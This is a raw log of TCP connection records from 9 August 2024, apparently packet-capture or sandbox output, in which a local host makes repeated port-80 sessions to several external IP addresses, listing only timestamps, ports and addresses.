Aug 9, 2024 08:41:22.448559999 CEST	80	49727	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:22.448637009 CEST	49727	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:22.450366974 CEST	49727	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:22.455184937 CEST	80	49727	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:22.940562010 CEST	80	49727	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:22.940737009 CEST	49727	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:23.958880901 CEST	49727	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:23.963785887 CEST	80	49727	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:24.977124929 CEST	49728	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:24.982134104 CEST	80	49728	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:24.982264996 CEST	49728	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:24.983978987 CEST	49728	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:24.990678072 CEST	80	49728	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:25.447479010 CEST	80	49728	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:25.447575092 CEST	49728	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:26.490071058 CEST	49728	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:26.495166063 CEST	80	49728	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:27.509322882 CEST	49729	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:27.519242048 CEST	80	49729	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:27.519370079 CEST	49729	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:27.521006107 CEST	49729	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:27.528707981 CEST	80	49729	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:27.528728008 CEST	80	49729	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:27.986923933 CEST	80	49729	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:27.987267017 CEST	49729	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:29.037117958 CEST	49729	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:29.042196035 CEST	80	49729	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:30.055510044 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:30.060590029 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:30.060798883 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:30.062587976 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:30.067565918 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351447105 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351501942 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351516008 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351531029 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351545095 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351557970 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351763010 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.351763010 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.351862907 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351877928 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351891994 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351907015 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.351938009 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.351974010 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.357021093 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.357034922 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.357055902 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.357069969 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.357234955 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.357234955 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.444200039 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.444217920 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.444232941 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.444247961 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.444434881 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.444436073 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.444626093 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:31.444793940 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.448421001 CEST	49730	80	192.168.2.6	208.91.197.27
Aug 9, 2024 08:41:31.453398943 CEST	80	49730	208.91.197.27	192.168.2.6
Aug 9, 2024 08:41:46.383789062 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:46.388674974 CEST	80	49732	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:46.388748884 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:46.390535116 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:46.395347118 CEST	80	49732	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:47.519009113 CEST	80	49732	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:47.519032955 CEST	80	49732	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:47.519113064 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:47.519239902 CEST	80	49732	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:47.520103931 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:47.520350933 CEST	80	49732	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:47.520425081 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:47.899525881 CEST	49732	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:48.915600061 CEST	49733	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:48.920540094 CEST	80	49733	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:48.920598030 CEST	49733	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:48.922840118 CEST	49733	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:48.927634001 CEST	80	49733	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:49.780344009 CEST	80	49733	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:49.780594110 CEST	80	49733	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:49.786447048 CEST	49733	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:50.429646969 CEST	49733	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:51.446192980 CEST	49734	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:51.451097012 CEST	80	49734	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:51.453783989 CEST	49734	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:51.457956076 CEST	49734	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:51.462821007 CEST	80	49734	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:51.462888002 CEST	80	49734	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:52.326415062 CEST	80	49734	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:52.326452017 CEST	80	49734	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:52.326508045 CEST	49734	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:52.960172892 CEST	49734	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:53.976989031 CEST	49735	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:54.652743101 CEST	80	49735	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:54.652899981 CEST	49735	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:54.654928923 CEST	49735	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:54.661633968 CEST	80	49735	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:55.512960911 CEST	80	49735	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:55.513230085 CEST	80	49735	43.252.167.188	192.168.2.6
Aug 9, 2024 08:41:55.515795946 CEST	49735	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:55.518731117 CEST	49735	80	192.168.2.6	43.252.167.188
Aug 9, 2024 08:41:55.523964882 CEST	80	49735	43.252.167.188	192.168.2.6
Aug 9, 2024 08:42:00.631314039 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:00.636159897 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:00.636224031 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:00.637990952 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:00.642807007 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.305831909 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.305855989 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.305865049 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.305931091 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.305968046 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:01.305999994 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.306010962 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.306051970 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:01.306108952 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.306108952 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:01.306294918 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.306633949 CEST	80	49736	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:01.306718111 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:02.147726059 CEST	49736	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:03.183150053 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:03.188122034 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.188196898 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:03.213933945 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:03.219108105 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866144896 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866161108 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866168976 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866225004 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866235971 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866274118 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:03.866383076 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:03.866810083 CEST	80	49737	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:03.866902113 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:04.725023031 CEST	49737	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:05.759727955 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:05.764694929 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:05.767849922 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:05.771739006 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:05.780116081 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:05.780416965 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438663006 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438692093 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438703060 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438731909 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:06.438822031 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438834906 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438846111 CEST	80	49738	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:06.438857079 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:06.438884974 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:07.271420002 CEST	49738	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.289652109 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.294606924 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.294668913 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.296518087 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.301337957 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965529919 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965735912 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965749025 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965805054 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965800047 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.965818882 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965888023 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.965892076 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:08.965946913 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.991360903 CEST	49739	80	192.168.2.6	194.9.94.85
Aug 9, 2024 08:42:08.996248960 CEST	80	49739	194.9.94.85	192.168.2.6
Aug 9, 2024 08:42:14.842983961 CEST	49740	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:14.849185944 CEST	80	49740	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:14.849256039 CEST	49740	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:14.851496935 CEST	49740	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:14.858243942 CEST	80	49740	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:16.365062952 CEST	49740	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:16.412091970 CEST	80	49740	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:17.383460999 CEST	49741	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:17.391469955 CEST	80	49741	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:17.394207001 CEST	49741	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:17.395926952 CEST	49741	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:17.400949001 CEST	80	49741	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:18.912010908 CEST	49741	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:18.959922075 CEST	80	49741	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:19.942234993 CEST	49743	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:19.947304964 CEST	80	49743	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:19.952621937 CEST	49743	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:19.966156006 CEST	49743	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:19.971122026 CEST	80	49743	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:19.971633911 CEST	80	49743	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:21.474682093 CEST	49743	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:21.849843979 CEST	49743	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:21.959497929 CEST	80	49743	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:21.961575031 CEST	80	49743	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:22.492989063 CEST	49744	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:22.498050928 CEST	80	49744	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:22.498135090 CEST	49744	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:22.499869108 CEST	49744	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:22.504630089 CEST	80	49744	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:36.431965113 CEST	80	49740	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:36.432039022 CEST	49740	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:38.778552055 CEST	80	49741	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:38.778642893 CEST	49741	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:41.359314919 CEST	80	49743	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:41.359513998 CEST	49743	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:43.871406078 CEST	80	49744	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:43.875899076 CEST	49744	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:43.883905888 CEST	49744	80	192.168.2.6	23.251.54.212
Aug 9, 2024 08:42:43.889055967 CEST	80	49744	23.251.54.212	192.168.2.6
Aug 9, 2024 08:42:49.025180101 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.030165911 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.030230045 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.032668114 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.037770987 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639075994 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639111042 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639132023 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639166117 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639180899 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639203072 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639211893 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.639242887 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.639250994 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639271021 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.639288902 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.639348030 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.639642954 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.640127897 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.640341043 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.644522905 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.644541025 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.644555092 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.644646883 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.730098963 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.730129957 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.730146885 CEST	80	49745	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:49.730232954 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:49.730324984 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:50.537309885 CEST	49745	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:51.554939985 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:51.811448097 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:51.811968088 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:51.815893888 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:51.822309971 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428436041 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428461075 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428507090 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.428541899 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428556919 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428571939 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428589106 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428596973 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.428611994 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428623915 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.428875923 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428891897 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428910017 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.428915977 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.428949118 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.433643103 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.433656931 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.433671951 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.433690071 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.474419117 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.518523932 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.519131899 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.519145966 CEST	80	49746	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:52.519170046 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:52.519188881 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:53.318226099 CEST	49746	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:54.336823940 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:54.341866970 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:54.341965914 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:54.344116926 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:54.349347115 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:54.349356890 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038347006 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038362980 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038404942 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038415909 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038428068 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038438082 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.038472891 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.038737059 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038748026 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038758039 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038780928 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.038808107 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.038844109 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038855076 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.038891077 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.043406010 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.043416977 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.043427944 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.043468952 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.083863974 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.129010916 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.129034042 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.129040003 CEST	80	49747	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:55.129218102 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:55.852093935 CEST	49747	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:56.868525028 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:56.873728991 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:56.873799086 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:56.876013041 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:56.881042004 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475004911 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475024939 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475035906 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475244045 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.475311041 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475344896 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475354910 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475367069 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475377083 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475388050 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475397110 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.475460052 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.475460052 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.480406046 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.480422974 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.480434895 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.480602026 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.810143948 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.810161114 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.810549021 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.810667038 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.810775042 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.811008930 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.811325073 CEST	80	49748	199.192.19.19	192.168.2.6
Aug 9, 2024 08:42:57.812966108 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.812966108 CEST	49748	80	192.168.2.6	199.192.19.19
Aug 9, 2024 08:42:57.817801952 CEST	80	49748	199.192.19.19	192.168.2.6
